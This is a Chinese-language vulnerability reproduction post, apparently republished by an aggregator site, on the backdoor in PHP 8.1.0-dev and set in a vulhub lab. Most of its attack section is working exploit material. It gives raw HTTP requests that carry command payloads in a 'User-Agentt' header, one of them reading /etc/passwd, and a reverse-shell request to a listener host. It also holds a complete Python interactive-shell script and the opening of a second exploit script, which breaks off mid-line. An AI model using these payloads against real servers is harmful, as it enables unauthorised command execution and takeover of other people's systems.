PHP 8.1.0-dev 后门远程命令执行漏洞复现

Posted 2021-09-10 CCIC周树人_检测_认证

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了PHP 8.1.0-dev 后门远程命令执行漏洞复现相关的知识，希望对你有一定的参考价值。

0x01 简介

php verion 8.1.0-dev于2021年3月28日与后门一起发布，但是后门很快被发现并删除。

0x02 漏洞概述

PHP verion 8.1.0-dev的PHP在服务器上运行，则攻击者可以通过发送User-Agentt标头执行任意代码。

0x03 影响版本

PHP 8.1.0-dev

0x04 环境搭建

使用vulhub进行搭建：
cd vulhub/php/8.1-backdoor
sudo docker-compose up -d

访问主页
http://192.168.40.140:8080/

0x05 漏洞复现

1、POC验证
GET / HTTP/1.1
Host: 192.168.40.140:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
User-Agentt: zerodiumvar_dump(2*3); //或者User-Agentt: zerodiumsystem("cat /etc/passwd");
Upgrade-Insecure-Requests: 1

图片

!/usr/bin/env python3

import os
import re
import requests

host = input("Enter the full host url:\\n")
request = requests.Session()
response = request.get(host)

if str(response) == \'<Response [200]>\':

print("\\nInteractive shell is opened on", host, "\\nCan\'t access tty; job crontol turned off.")
try:
    while 1:
        cmd = input("$ ")
        headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:68.0) Gecko/20100101 Firefox/68.0",
        "User-Agentt": "zerodiumsystem(\'" + cmd + "\');"
        }
        response = request.get(host, headers = headers, allow_redirects = False)
        current_page = response.text
        stdout = current_page.split(\'<!DOCTYPE html>\',1)
        text = print(stdout[0])
except KeyboardInterrupt:
    print("Exiting...")
    exit

else:

print("\\r")
print(response)
print("Host is not available, aborting...")
exit

2、反弹shell或执行exp
GET / HTTP/1.1
Host: 192.168.40.140:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ADMINCONSOLESESSION=LBY9g1TYdvw2RyGQCX7JTQGt7Rn6TJnDmWhyJtKwMj2nL0M6GyyY!-1150793974; JSESSIONID=0B07F68800D0F5C0D8BD254A8748E2FF
User-Agentt: zerodiumsystem("bash -c \'exec bash -i >& /dev/tcp/192.168.40.129/6666 0>&1\'");
Upgrade-Insecure-Requests: 1

EXP：
import argparse, textwrap
import requests
import sys

parser = argparse.ArgumentParser(description="PHP 8.1.0-dev WebShell RCE", formatter_class=argparse.RawTextHelpFormatter,
epilog=textwrap.dedent(\'\'\'
Exploit Usage :
./exploit.py -l http://127.0.0.1
[^] WebShell= id
OR
[^] WebShell= whoami
\'\'\'))

parser.add_argument("-l","--url", help="PHP 8.1.0-dev Target URL(Example:

以上是关于PHP 8.1.0-dev 后门远程命令执行漏洞复现的主要内容，如果未能解决你的问题，请参考以下文章

Web安全篇学习笔记4

复现2003方程式远程命令执行漏洞

漏洞log4j2远程执行代码复现实操代码例子

PhpStudy后门漏洞实战复现

php 远程代码执行漏洞怎么修复

bash远程命令执行漏洞怎么修复